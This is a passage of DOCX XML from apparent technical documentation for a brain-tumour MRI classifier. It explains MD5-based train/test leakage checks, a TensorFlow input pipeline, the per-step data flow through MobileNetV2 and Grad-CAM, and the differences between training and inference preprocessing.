        <w:t>superimposed = np.uint8(original_rgb * (1.0 - alpha) + jet_rgb * alpha)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Linear alpha-blending formula.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>original_rgb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: NumPy array </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(H, W, 3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, uint8.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>heatmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: NumPy array </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(7, 7)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, float32.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>alpha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Float between $0.0$ and $1.0$ controlling overlay opacity (calibrated default: $0.45$).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Return Values:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tuple of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(superimposed_image, pure_jet_heatmap)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</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6.2 Dissecting `notebooks/01_data_exploration.ipynb`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Block 1: Cryptographic MD5 Deduplication &amp; Leakage Detection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import hashlib</w:t>
              <w:br/>
              <w:br/>
              <w:t>def compute_image_hash(filepath):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    # Computes MD5 hash of an image file on disk.</w:t>
              <w:br/>
              <w:t xml:space="preserve">    hasher = hashlib.md5()</w:t>
              <w:br/>
              <w:t xml:space="preserve">    with open(filepath, "rb") as f:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        buf = f.read()</w:t>
              <w:br/>
              <w:t xml:space="preserve">        hasher.update(buf)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return hasher.hexdigest()</w:t>
              <w:br/>
              <w:br/>
              <w:t># Extract hashes across all training and testing images</w:t>
              <w:br/>
              <w:t>train_hashes = {compute_image_hash(p): p for p in train_files}</w:t>
              <w:br/>
              <w:t>test_hashes = {compute_image_hash(p): p for p in test_files}</w:t>
              <w:br/>
              <w:br/>
              <w:t># Compute set intersection</w:t>
              <w:br/>
              <w:t>leaked_hashes = set(train_hashes.keys()).intersection(set(test_hashes.keys()))</w:t>
              <w:br/>
              <w:t>print(f"Total Unique Train Images : {len(train_hashes)}")</w:t>
              <w:br/>
              <w:t>print(f"Total Unique Test Images  : {len(test_hashes)}")</w:t>
              <w:br/>
              <w:t>print(f"Data Leakage Detected     : {len(leaked_hashes)} images")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Line-by-Line Mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>open(filepath, "rb")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Opens image file in binary read mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>hasher.update(buf)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Computes an MD5 128-bit hash digest. If two images have identical pixel bytes—even if their filenames are completely different—their MD5 hashes will match 100%.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>set(train_hashes.keys()).intersection(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Finds identical files present in both training and test sets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Clinical/Engineering Significance:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0 leaked images.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> This provides mathematical proof that the model was never tested on memorized training images, validating the integrity of our test accuracy figures.</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6.3 Dissecting `notebooks/02_model_training.ipynb`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Block 1: The `tf.data` Input Pipeline &amp; Performance Optimization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AUTOTUNE = tf.data.AUTOTUNE</w:t>
              <w:br/>
              <w:br/>
              <w:t># Load training directory</w:t>
              <w:br/>
              <w:t>raw_train_ds = tf.keras.utils.image_dataset_from_directory(</w:t>
              <w:br/>
              <w:t xml:space="preserve">    TRAIN_DIR,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    image_size=(224, 224),</w:t>
              <w:br/>
              <w:t xml:space="preserve">    batch_size=32,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    color_mode="rgb",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    label_mode="categorical",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    shuffle=True,</w:t>
              <w:br/>
              <w:t xml:space="preserve">    seed=42</w:t>
              <w:br/>
              <w:t>)</w:t>
              <w:br/>
              <w:br/>
              <w:t># Pipeline optimization</w:t>
              <w:br/>
              <w:t>train_ds = raw_train_ds.cache().shuffle(buffer_size=1000).prefetch(buffer_size=AUTOTUNE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Line-by-Line Mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>image_dataset_from_directory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Reads directory structure where subfolder names become class labels. Returns a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tf.data.Dataset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> yielding batches of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(images, labels)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>label_mode="categorical"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Encodes labels as one-hot vectors of length 4 (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[1, 0, 0, 0]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for glioma).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.cache()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Keeps decoded image tensors in memory after the first epoch, eliminating redundant disk I/O bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.shuffle(buffer_size=1000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Randomly shuffles images within a 1,000-image sliding window, preventing the model from learning spurious batch-order correlations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.prefetch(buffer_size=AUTOTUNE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: Overlaps CPU data preprocessing with GPU/CPU model forward-passes, eliminating hardware idle time.</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7: Complete Data Flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>7.1 End-to-End Data Journey: From Pixel to Diagnosis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Here is the exact step-by-step path that information takes through the NeuroScan AI system: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Step 1: Raw Image File ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ (e.g. Te-gl_0010.jpg on disk: 512 x 512, Grayscale JPEG)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ▼</w:t>
              <w:br/>
              <w:t>[ Step 2: Ingestion &amp; Format Standardization ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ Image.open() -&gt; convert("RGB") -&gt; 3 Channels</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ▼</w:t>
              <w:br/>
              <w:t>[ Step 3: Spatial Resizing ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ cv2.resize(img, (224, 224)) -&gt; Array shape: (224, 224, 3), dtype: uint8 [0, 255]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ▼</w:t>
              <w:br/>
              <w:t>[ Step 4: Batch Dimension Expansion ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ np.expand_dims(..., axis=0) -&gt; Tensor shape: (1, 224, 224, 3), dtype: float32</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ▼</w:t>
              <w:br/>
              <w:t>[ Step 5: MobileNetV2 Normalization ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ tf.keras.applications.mobilenet_v2.preprocess_input() -&gt; Values scaled to [-1.0, 1.0]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ▼</w:t>
              <w:br/>
              <w:t>[ Step 6: Convolutional Feature Extraction ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ MobileNetV2 Base (53 Inverted Residual Blocks)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ▼</w:t>
              <w:br/>
              <w:t>[ Step 7: Deepest Feature Map Layer ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ Layer: out_relu -&gt; Shape: (1, 7, 7, 1280) (Spatial coordinates intact!)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ▼</w:t>
              <w:br/>
              <w:t>[ Step 8: Spatial Dimensionality Reduction ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ GlobalAveragePooling2D() -&gt; Vector of shape: (1, 1280)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ▼</w:t>
              <w:br/>
              <w:t>[ Step 9: Dense Classification Head ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ BatchNorm -&gt; Dropout(0.3) -&gt; Dense(128, ReLU) -&gt; BatchNorm -&gt; Dropout(0.2)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ▼</w:t>
              <w:br/>
              <w:t>[ Step 10: Probability Distribution Output ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ Dense(4, Softmax) -&gt; Vector of shape: (1, 4), values sum to 1.0</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ▼</w:t>
              <w:br/>
              <w:t>[ Step 11: Prediction Decoding ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ argmax(probs) -&gt; Predicted Class Index (e.g. 0 -&gt; "Glioma Tumor")</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ Confidence Score = probs[0] * 100 (e.g. 96.8%)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ▼</w:t>
              <w:br/>
              <w:t>[ Step 12: Grad-CAM Gradient Backpropagation ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ tf.GradientTape backpropagates d(score_glioma) / d(out_relu)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ Importance Weights: alpha_k = reduce_mean(gradients, axis=(0,1,2))</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ Saliency Map: ReLU( sum(alpha_k * feature_map_k) ) -&gt; Shape: (7, 7)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ▼</w:t>
              <w:br/>
              <w:t>[ Step 13: Thermal Visualization &amp; Superimposition ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ Upsample 7x7 -&gt; 224x224 -&gt; cv2.COLORMAP_JET -&gt; Alpha Blend (alpha=0.45)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      ▼</w:t>
              <w:br/>
              <w:t>[ Step 14: Reactive Browser Display ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      │ Streamlit renders Primary Badge, Saliency Studio, &amp; Multi-Class Progress Bars</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7.2 Tracing a Real Sample Record: `Te-gl_0010.jpg`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Let us follow an actual test scan through every mathematical transformation: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40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Processing Stage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Operation / Function</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Data Structure &amp; Type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Shape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Value Range / Concrete Example</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**1. Disk Storage**</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File on disk</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JPEG Binary file</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N/A</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`d:\Brain_Tumor\dataset\Testing\glioma\Te-gl_0010.jpg`</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**2. Decoding**</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`Image.open(path).convert("RGB")`</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PIL RGB Image</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 xml:space="preserve">$512 </w:t>
              <w:tab/>
              <w:t>imes 512$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3 channels, 8-bit color</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**3. Spatial Resize**</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`cv2.resize(img_rgb, (224, 224))`</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NumPy array (`uint8`)</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`(224, 224, 3)`</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Integers $[0, 255]$</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**4. Tensor Packaging**</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`np.expand_dims(arr.astype('float32'), 0)`</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NumPy array (`float32`)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`(1, 224, 224, 3)`</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Floats $[0.0, 255.0]$</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**5. Preprocessing**</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`mobilenet_v2.preprocess_input(tensor)`</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TensorFlow Tensor (`float32`)</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`(1, 224, 224, 3)`</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Floats $[-1.0, 1.0]$</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**6. Convolution**</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`base_model(prep_img)`</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TensorFlow Tensor (`float32`)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`(1, 7, 7, 1280)`</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Output of `out_relu` activation</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**7. Spatial Pooling**</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`GlobalAveragePooling2D()(features)`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TensorFlow Tensor (`float32`)</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`(1, 1280)`</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Mean activation per filter</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**8. Dense Projection**</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`dense_128(pooled)`</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TensorFlow Tensor (`float32`)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`(1, 128)`</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ReLU activations $\ge 0.0$</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**9. Classification**</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`output_predictions(head_features)`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TensorFlow Tensor (`float32`)</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`(1, 4)`</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`[0.9682, 0.0214, 0.0018, 0.0086]`</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**10. Argmax**</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`np.argmax(probs)`</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Python Integer</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Scalar</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`0` (Maps to `"glioma"`)</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**11. Gradients**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`tape.gradient(score, conv_features)`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TensorFlow Tensor (`float32`)</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`(1, 7, 7, 1280)`</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Local gradient vectors</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**12. Saliency Map**</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Weighted Sum + ReLU + Normalization</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NumPy array (`float32`)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`(7, 7)`</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Continuous floats $[0.0, 1.0]$</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**13. Colormap**</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`cv2.applyColorMap(uint8_map, JET)`</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NumPy array (`uint8`)</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`(224, 224, 3)`</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BGR thermal colors $[0, 255]$</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**14. Compositing**</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`(1-alpha)*original + alpha*jet`</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NumPy array (`uint8`)</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`(224, 224, 3)`</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RGB Superimposed diagnostic image</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7.3 Training Preprocessing vs. Inference Preprocessing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A major source of confusion for junior engineers is the difference between data pipelines during </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>training</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> versus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>inference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w: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20" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Aspect</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Training Pipeline (`02_model_training.ipynb`)</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Inference Pipeline (`app.py`)</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Why the Difference Exists?</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**Input Source**</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Batch generator from disk (`5,600` images)</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Single image from user upload or test picker</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Training optimizes model weights over large datasets; inference predicts on one patient.</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**Batch Size**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$32$ images simultaneously</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Exactly $1$ image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Memory efficiency vs. real-time single-patient latency.</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**Data Augmentation**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**Active (`training=True`)**: Random flips, 5% rotations, 5% zooms</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**Disabled (`training=False`)**: Deterministic pixel pass-through</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Augmentation prevents overfitting during training; during diagnosis, we must never alter the patient's true scan!</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**Batch Normalization**</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Computes running batch mean &amp; variance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Uses frozen moving mean &amp; variance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Batch statistics must remain constant during inference to avoid prediction drift.</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**Dropout**</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Randomly zeros out 30% and 20% of activations</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**Disabled**: All neurons active, scaled by keep-probability</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Regularization is only needed during weight optimization.</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**Shuffle**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Enabled (`shuffle=True`, buffer=1000)</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Disabled (`shuffle=False`)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Order does not matter for single-scan prediction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pP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8: Machine Learning Model Explained</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>8.1 Convolutional Neural Networks (CNN) Explained Simply</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The Five-Year-Old Child Analogy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Imagine you are looking through a small cardboard toilet paper tube at a massive puzzle on the floor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>When you look through the tube at one tiny corner, you can only see a small straight line or a patch of color.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
